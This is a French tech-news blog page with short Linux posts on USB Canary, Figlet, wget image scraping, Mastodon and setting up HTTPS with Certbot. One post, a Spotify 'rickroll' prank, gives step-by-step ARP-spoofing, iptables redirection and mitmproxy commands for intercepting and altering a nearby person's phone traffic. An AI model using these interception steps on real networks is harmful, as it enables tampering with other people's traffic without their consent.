Korben - Site d'actualité geek et tech



  • DANS TON CHAT (BASHFR)

    Damned dit : Arrête j’ai trop peur des séismes et je flippe à chaque secousse
    Ringo dit : Ah ouais ?
    * Vous avez envoyé un wizz !
    Damned dit : CONNARD

    -- http://danstonchat.com/12644.html
  • RSS Emplois sécurité

  • Site hébergé par
    Agarik Sponsor Korben
  • Selection de contenus

  • Les articles dans "Linux"

    USB Canary – Pour savoir quand on utilise un port USB à votre insu

    Commentaires fermés sur USB Canary – Pour savoir quand on utilise un port USB à votre insu

    Si vous êtes sous Linux et que vous voulez savoir si quelqu'un a branché une clé USB ou un appareil USB sur votre ordinateur pendant votre absence, voici USB Canary !

    Cet outil dont les sources et la doc sont dispo ici permet de surveiller vos ports USB, y compris quand votre ordinateur est verrouillé. Ainsi, en cas d'accès, il est capable de vous envoyer un message.

    C'est du python, donc pour l'installer, il vous faudra des bibliothèques tierces (à installer avec la commande pip) comme :

    (La doc est ici)

    Ensuite, en éditant le fichier settings.json, vous pourrez configurer les moyens d'alerte (Slack ou SMS) et pour le lancer (ou l'arrêter) vous n'aurez qu'à lancer la commande suivante :

    ./usb_canary.py start | stop | restart

    L'autre intérêt d'un tel outil c'est que vous pouvez le modifier pour détecter quand une machine en mode airgap (non reliée à un réseau) est compromise, en adaptant le système d'alerte à votre propre système de surveillance (via de l'analyse de log ou des alertes sur d'autres ordinateurs présents dans la même zone airgappée). Les sysadmins sauront apprécier l'utilité de la chose.

    Source

    ZeleSouris 2.4GHz Souris ergonomique verticale sans fil

    26,99 €

    Pour éviter de lire tous les livres que l'on vous donne au programme cette année Essayer gratuitement les Livres audio

    Cette souris verticale possède un seul bouton conception conversion DPI - 1000/1600/600DIP Poignée verticale - Une prise facile pour empêcher la main de la souris Rouleaux mécaniques de précision - Pages longues ne devraient pas s'inquiéter, un glissement à la fin Conception de bouton surface latérale - pression - plus douce, sensible et plus de 3 millions de fois plus long Repose-poignets détachable - Selon leurs propres habitudes peut démonter installer repose-poignets

    En Savoir +

    Rickroller Spotify !

    Commentaires fermés sur Rickroller Spotify !

    Saviez-vous que l'application Spotify sous Android streamait les premières secondes d'une chanson en HTTP ? Et alors me direz-vous ?

    Et alors si vous êtes sur le même réseau qu'un ami ou un collègue qui utilise Spotify sur son smartphone Android, vous allez pouvoir le rickroller !!

    Comment ?

    Et bien grâce à une petite attaque de type Man In The Middle, qui va vous permettre de lui streamer la chanson de Rick Ashley au format OGG. Attention, pour que cela fonctionne, vous devez être en IPv4 et que votre "victime" n'ait pas déjà la chanson qu'il écoute dans le cache de Spotify.

    Installez dsniff suivi d'un proxy mitm :

    apt-get install dsniff

    pip install mitmproxy

    Puis redirigez le trafic HTTP vers le port 8080 :

    sysctl -w net.ipv4.ip_forward=1

    iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

    Ensuite, identifiez l'IP du téléphone Android, l'IP de la passerelle et lancez un ARP Spoof comme ceci :

    arpspoof -t [target ip] [gateway ip]

    # Exemple : arpspoof -t 192.168.1.101 192.168.1.1

    Chopez ensuite un morceau au format OGG, précisez son nom à la ligne 3 du fichier python rickroll.py que vous pouvez télécharger ici. Et lancez la commande suivante qui mettra en place un proxy transparent sur le port 8080 qui interceptera les requêtes HTTP en direction du domaine heads-akp.spotify.com.edgesuite.net.

    Et en avant le rick roll ! Oui c'est clairement se faire chier pour pas grand-chose, mais je sais que vous êtes joueur.

    mitmproxy -T -p 8080 -s rickroll.py -i "heads-akp.spotify.com.edgesuite.net"

     

    Figlet – Pour créer des bannières ASCII rapidement

    4

    Figlet est un petit utilitaire qui permet de créer des petits textes en ASCII directement depuis votre terminal. C'est plutôt cool, surtout qu'il y a des tonnes de polices différentes que vous pouvez voir ici.

    A vous ensuite d'utiliser le paramètre -f pour appliquer le bon style au texte de votre choix.

    Et si vous le souhaitez, vous pouvez même l'utiliser comme ceci avec par exemple la commande echo, pour rendre vos sorties de scripts plus jolies.

    Vous trouverez figlet dans vos dépôts préférés ou directement sur ce site.

    Récupérer toutes les images présentes sur une page web avec Wget

    5

    Si vous avez besoin de récupérer toutes les images présentes sur une page web, sans vous prendre la tête, voici une petite ligne de commande à base de Wget qui va vous permettre de faire ça.

    Ça peut servir pour automatiser des récupérations (via un CRON) ou faire par exemple le plein de fonds d'écran ou autre, sans avoir à faire "clic droit -> enregistrer l'image" 500 fois...

    wget -nd -H -p -A jpg,jpeg,png,gif -e robots=off https://korben.info

    Enjoy !


    Apprenez toutes les bases du Développement Web

    Le Développement Web de A à Z: HTML, CSS, Javascript, jQuery, Bootstrap, PHP, MySQL, WordPress

    Cette formation de près de 40h est LA formation la plus complète que vous pouvez trouver en ligne.
    Tout ce que vous devez connaître pour débuter ou booster votre carrière de développeur Web se trouve ici : HTML, CSS, JavaScript, jQuery, Bootstrap, PHP, MySQL, WordPress…

    Vous apprendrez en réalisant des projets concrets de A à Z avec le formateur.

    L’achat vous donne un accès à vie à tout le contenu et il dispose d’une garantie de 30 jours.

    Profitez de l’offre à 10€

    Mastodon – Un copié collé de Twitter libre et décentralisé

    9

    Depuis quelques jours, je reçois des tas de messages de gens qui me demandent d'aller jeter un oeil à Mastodon, un nouveau clone de Twitter...

    Mastodon error image

    La particularité et la force de Mastodon, c'est qu'il s'agit d'un logiciel libre qui permet de faire tout pareil que sur Twitter, mais de manière totalement décentralisée.  DM, mentions, like et compagnie, c'est un pur copié collé en termes de fonctionnalité avec des petits trucs en plus comme des emoticons, des flux public ou encore 500 caractères contre 140 pour Twitter. C'est vraiment un gros boulot très bien exécuté !!

    Le look sombre sur plusieurs colonnes me fait penser à Tweetdeck et l'outil est actuellement déployé sur plusieurs instances que vous pouvez retrouver ici pour vous inscrire (Faut que vous vous répartissiez dessus sinon, les serveurs vont pêter). Des clients desktops et mobiles sont également déjà proposés en beta.

    Alors des clones de Twitter libres et décentralisés, j'en ai déjà vu des tonnes et malheureusement, aucun n'a réellement fonctionné en termes d'adoption.

    Est-ce que Mastodon décollera et viendra chatouiller Twitter ? J'en doute, en tout cas, pas sous cette forme. Il faudrait une grosse levée de fond, des armées de commerciaux, des vedettes de Twitter qui basculent pour entrainer avec eux leurs followers, ainsi que des applications et des fonctionnalités vraiment innovantes pour espérer grappiller des internautes à Twitter...

    Évidemment, cela peut aussi se faire grâce à la communauté, mais j'ai peur que comme pour le bien triste Diaspora, cela se transforme en un Barbuland intolérant et que les échanges ouverts du début, laissent place à la rudesse d'une communauté bien renfermée sur elle-même, résumant le contenu à un flot continu de " * ça pu, c'est pas libre !", dégoutant ceux qui auraient pu préférer cet outil à Twitter ou Facebook dans leur vie de tous les jours.

    On verra bien... mais vous l'aurez compris, à moins que Twitter ferme soudainement ses portes et que tout le monde, pris de panique, migre sur Mastodon, je ne suis pas plus convaincu que ça, surtout à une époque ou le micro blogging (sur d'autres plateformes que Twitter) est un peu passé de mode face à des outils malheureusement plus fermés comme Slack ou Telegram mais qui explosent en terme d'usage.

    Enfin, on verra bien jusqu'où Mastodon ira. Je pense que l'outil aura son public, comme Diaspora ou d'autres mais pas certain qu'il devienne mainstream. Pourtant on en aurait bien besoin pour reprendre la main sur nos données et nos services. Quoiqu'il en soit, je lui souhaite le meilleur pour la suite !

    POUET !!

    Sécuriser facilement et gratuitement un site avec HTTPS

    31

    Vous connaissez sans doute tous, Let's encrypt qui permet d'avoir un certificat SSL gratuit pour basculer son site en HTTPS. Mais connaissez-vous Certbot, un outil proposé par l'EFF (Electronic Frontier Foundation) qui permet d'obtenir en une ligne de commande son certificat et de configurer dans la foulée son serveur web ?

    Je n'avais pas encore pris le temps de le tester et je me dis que c'est l'occasion aujourd'hui de vous en faire un petit tuto rapide. Vous allez voir, c'est rapide, sans douleur et de toute façon, vous devrez tous y passer.

    Voici donc comment migrer un site web (sous WordPress dans mon exemple, mais ça fonctionne avec tout) de HTTP vers HTTPS.

    Première étape : Installer CERTBOT sur votre serveur.

    Pour cela, téléchargez le script, rendez le executable et lancez-le :

    wget https://dl.eff.org/certbot-auto

    chmod a+x certbot-auto

    Seconde étape : Générez les certificats.

    Si comme moi, vous utilisez nginx, lancez la commande :

    ./certbot-auto --nginx

    Et si vous utilisez Apache :

    ./certbot-auto --apache

    Certbot va alors lister vos virtualhosts (les sites web présents sur votre serveur). Entrez les numéros de ceux que vous voulez migrer en HTTPS. Si c'est votre première fois, je vous invite à le faire site par site. Dans le cas d'un WordPress, pensez aussi à désactiver les plugins, car certains pourraient poser problème.

    À partir de là, Certbot va générer les certificats Let's Encrypt qui vont bien et modifier la conf Apache / Nginx pour que ce soit le HTTPS qui soit activé par défaut pour votre site. Certbot vous demandera d'ailleurs si vous voulez passer exclusivement en HTTPS (2/ Secure) ou garder aussi une connexion HTTP (1/ Easy).

    Je vous recommande de choisir l'option 2 pour éviter les contenus dupliqués. Certbot va encore prendre quelques secondes et voilà, la configuration est terminée. C'était facile non ? À vous de tester votre site en HTTPS maintenant. Il se peut que vous ayez un peu de "mixed content"... Pour le régler, vous devrez peut être corriger certains appels dans votre thème, parfois dans vos plugins, voire préciser votre URL en HTTPS dans votre fichier wp-config.php comme ceci :

    define('WP_HOME','https://VOTRESITE.com');
    define('WP_SITEURL','https://VOTRESITE.com');

    Si malgré cela, vous remarquez que votre site reste accessible en HTTP aussi, éditez votre VirtualHost et décommentez la partie concernant les redirections 301 de HTTP vers HTTPS. Voici ce que j'ai comme exemple sous nginx :

    Pour faire tester votre config SSL, vous pouvez aussi utiliser le service ssllabs dont j'ai déjà parlé, en utilisant cette URL :

    https://www.ssllabs.com/ssltest/analyze.html?d=URLDEVOTRESITE.COM

    3ème étape : Automatiser le renouvellement de vos certificats.
    (suite…)

    Ecoutez de la musique en ligne de commande

    Si vous aimez la musique et la ligne de commande, j’ai une solution pour tous les barbus du coton-tige que vous êtes.
    Ça s’appelle MPS et c’est un soft destiné à vos terminaux Linux, OSX et même Windows qui permet de rechercher de la musique (albums, morceaux, artistes…), de créer des playlists, de télécharger ces morceaux, et de

    Canary Tokens – Un outil pour savoir

    si on vous espionne

    Êtes-vous espionné ? Quelqu’un lit-il vos emails ? Êtes-vous certain que personne d’autre que vous n’accède à votre Dropbox ? Comment être sûr que personne ne consulte les documents que vous stockez sur votre ordinateur ?

    Pas simple !